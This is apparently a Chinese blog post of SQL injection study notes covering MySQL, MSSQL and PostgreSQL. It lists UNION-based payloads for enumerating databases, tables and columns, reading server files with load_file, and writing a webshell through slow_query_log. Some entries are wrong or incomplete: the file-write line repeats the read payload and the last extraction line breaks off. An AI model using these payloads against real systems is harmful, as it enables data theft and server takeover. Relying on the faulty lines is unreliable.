网络安全之攻防笔记--通用漏洞SQL注入之MySQL&mssql&postgresql

Dawndddddd2025-02-19 22:08

  • 通用漏洞SQL注入之mysql&h&mssql&postgresql

    • mysql数据库

      • root高权限读写注入

        • 读取文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 写入文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 路径获取
          • phpinfo,报错,字典等

        • 无法写入

          • secure_file_priv 突破 注入中需要支持 SQL 执行环境,没有就需要借助 phpmyadmin 或能够直接连上对方数据库进行绕过
          • set global slow_query_log=1
          • set global slow_query_log_file='shell 路径';
          • select '' or SLEEP(1);
    • mssql数据库

      • 高权限读写注入

        • 可以执行系统命令、读写文件操作

        • 测列数

          • ORDER BY 4
          • AND 1=2 UNION SELECT NULL,NULL,NULL,NULL
        • 测显位
          • AND 1=2 UNION SELECT NULL,'NULL',NULL,NULL

        • 获取信息

          • AND 1=2 UNION SELECT NULL,@@VERSION,NULL,NULL
          • AND 1=2 UNION SELECT NULL,SUSER_NAME(),NULL,NULL
          • AND 1=2 UNION SELECT NULL,DB_NAME(),NULL,NULL
        • 获取数据库名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM master..sysdatabases
        • 获取表名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM sysobjects WHERE xtype='U'
        • 获取数据
          • AND 1=2 UNION SELECT NULL,column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'
    • postgresql数据库

      • 高权限读写注入

        • 测列数

          • order by 4
          • and 1=2 union select null,null,null,null

        • 测显位:第2,3

          • and 1=2 union select 'null',null,null,null 错误
          • and 1=2 union select null,'null',null,null 正常
          • and 1=2 union select null,null,'null',null 正常
          • and 1=2 union select null,null,null,'null' 错误

        • 获取信息

          • and 1=2 UNION SELECT null,version(),null,null
          • and 1=2 UNION SELECT null,current_user,null,null
          • and 1=2 union select null,current_database(),null,null
        • 获取数据库名:
          • and 1=2 union select null,string_agg(datname,','),null,null from pg_database

        • 获取表名

          • 1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
          • 2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
        • 获取数据
          • and 1=2 union select

    • 另外

      • access无高权限注入点--只能猜解,还是暴力猜解
      • MySQL,postgresql,mssql高权限注入点-可升级读写执行
相关推荐
左左右右左右摇晃36 分钟前
数据结构——数组
数据结构·笔记·算法
nainaire40 分钟前
速通LeetCode hot100——(1~9 哈希,双指针,滑动窗口)
c++·笔记·算法·leetcode
hmbbcsm1 小时前
动手学习深度学习学习笔记(一)
笔记·学习
春水碧于天,画船听雨眠1 小时前
jQuery学习笔记
笔记·学习·jquery
123过去2 小时前
mdb-sql使用教程
linux·网络·数据库·sql
今儿敲了吗3 小时前
DS-2 有/无头结点的单向链表
数据结构·笔记·链表
猹叉叉(学习版)3 小时前
【系统分析师_知识点整理】 6.企业信息化
笔记·软考·企业信息化·系统分析师
北岛寒沫3 小时前
北京大学国家发展研究院 中国经济专题 课程笔记(第三课 人口与劳动力)
经验分享·笔记·学习
Xueqian E4 小时前
修复shell脚本失败的修改
笔记
ysa0510304 小时前
迷宫传送[最短路径]
c++·笔记·算法·深度优先
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南032026年3月AI领域大事件:DeepSeek引领开源风暴04围棋-html版本05班级宠物园部署指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07OpenClaw 使用和管理 MCP 完全指南08UV安装并设置国内源09“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)10OpenClaw Control UI安全上下文访问配置